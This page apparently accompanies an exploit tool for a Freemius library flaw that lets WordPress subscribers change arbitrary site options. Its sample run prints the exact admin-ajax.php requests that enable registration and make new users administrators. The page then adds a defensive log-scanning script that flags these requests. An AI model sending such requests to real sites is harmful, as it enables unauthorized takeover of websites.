Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
The library, used in numerous plugins, does not perform proper authorization when updating blog options, allowing any authenticated user, such as a subscriber, to update arbitrary options.
usage: exploit.py [-h] -u URL [-un USERNAME] [-p PASSWORD] [-f FIX]
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update Description: The library, used in numerous plugins, does not have proper authorization when updating blog options, allowing any authenticated users, such as a subscriber, to update arbitrary options.
options:
-h, --help show this help message and exit
-u URL, --url URL Website URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-f FIX, --fix FIX Reset after Exploit
$ python3 exploit.py -u http://wordpress.lan -un user -p useruser1
Plugin: wp-affiliate-disclosure Version: 1.1.4 Not found.
Info: Using plugin 404-to-301 running version 3.0.1
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
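From the defender's side, the two admin-ajax.php requests printed above leave a clear trace in the web server access log. The following is an added example, not code from the exploit or from the Freemius library: it parses combined-format access log lines, flags every request to the fs_set_db_option action, and rates those touching registration or role options as high severity. The sample log lines and the list of sensitive option names are constructed assumptions.

```python
# Added detection example (not part of the exploit page or the Freemius library): scan
# access-log lines for the fs_set_db_option admin-ajax action and flag security-sensitive
# option names. Sample log lines and SENSITIVE_OPTIONS are constructed assumptions.
import re
from urllib.parse import urlsplit, parse_qs

SENSITIVE_OPTIONS = {"users_can_register", "default_role", "admin_email", "siteurl", "home"}

# Combined log format: client IP, ident, user, [timestamp], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_request(line):
    """Return (ip, method, path, query dict) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    # parse_qs returns a list per parameter; keep the first value of each.
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return m.group("ip"), m.group("method"), parts.path, query

def detect_fs_option_updates(lines):
    """Return one finding per fs_set_db_option request; severity is 'high' for sensitive options."""
    findings = []
    for line in lines:
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, method, path, query = parsed
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        if query.get("action") != "fs_set_db_option":
            continue
        option = query.get("option_name", "")
        findings.append({
            "ip": ip,
            "option_name": option,
            "option_value": query.get("option_value", ""),
            "severity": "high" if option in SENSITIVE_OPTIONS else "medium",
        })
    return findings

# Constructed sample: the two option updates from the session above plus one benign ajax call.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1 HTTP/1.1" 200 12',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30',
]
```

A standard access log records only query-string parameters, so a POST body carrying the same parameters would not be caught here; pair this with application-level logging or a WAF rule on the action name, and treat any match from a non-administrator session as an incident.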